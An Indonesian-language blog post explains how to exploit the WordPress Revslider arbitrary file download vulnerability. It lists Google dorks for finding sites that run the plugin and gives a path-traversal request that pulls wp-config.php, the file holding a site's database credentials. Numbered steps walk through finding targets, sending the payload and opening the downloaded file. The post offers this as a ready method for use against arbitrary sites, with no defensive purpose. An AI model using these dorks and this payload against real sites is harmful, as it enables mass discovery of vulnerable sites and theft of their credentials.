Exploit Wordpress Revslider Arbritary File Download Vulnerability
Hai Sahabat Online Tect..
Kali ini kita akan bahas tentang Exploit Wordpress Revslider Arbritary File Download. Apa sih kegunaan Exploit ini? Exploit ini bisa kita gunakan untuk mengambil/mengunduh/mendownload File penting yang ada pada web tersebut, terutama untuk web yang menggunakan cms Wordpress tapi tidak semua web yang menggunakan cms tersebut rentan dengan exploit ini.
Menurut hasil yang saya dapatkan dari Exploit DB exploit ini ditemukan oleh Claudio Viviani pada tahun 2014, ia merupakan pemilik blog https://www.homelab.it/ yang berisi tentang security.
Baik Sobat sekalian, langsung aja ke pembahasan utamanya. Kami yang akan memberikan dork, exploit, dan cara untuk menggunakan nya. Simak baik baik yaa sobat Online Tect.
Dork :
- inurl:wp-content/plugins/revslider/
- inurl:revsliderinurl:revslider_admin.php
- inurl:revslider_front.php
- inurl:plugins/revslider/
- intext:Powered by Revslider
- intitle:"Index Of/ revslider"
- intitle:"Index Of/wp-content/themes/revslider"
- intitle:"Index Of/wp-content/plugins/revslider"
- intitle:"Index Of/admin/revslider"
- intitle:"Index Of/fr/revslider"
- intitle:"Index Of/en/revslider"
- intitle:"Index Of/us/revslider"
- intitle:"Index Of/ar/revslider"
- intitle:"Index Of/es/revslider"
- intitle:"Index Of/de/revslider"
Exploit :
/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
Step :
1. Dorking dengan dork yang sudah disediakan.
2. Jika kita sudah memiliki target yang vuln/rentan tinggal kasih exploit, contoh : http://site.co.id/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
3. Dan jika berhasil admin-ajax.php terdownload lalu buka dengan text editor.
Yups, Sekian pembahasan kali ini, semoga berguna buat kita semua. Jangan lupa share supaya blog ini berkembang juga agar kami juga semangat untuk membuat pembahasan pembahasan lainnya
Tidak ada komentar untuk "Exploit Wordpress Revslider Arbritary File Download Vulnerability"
Posting Komentar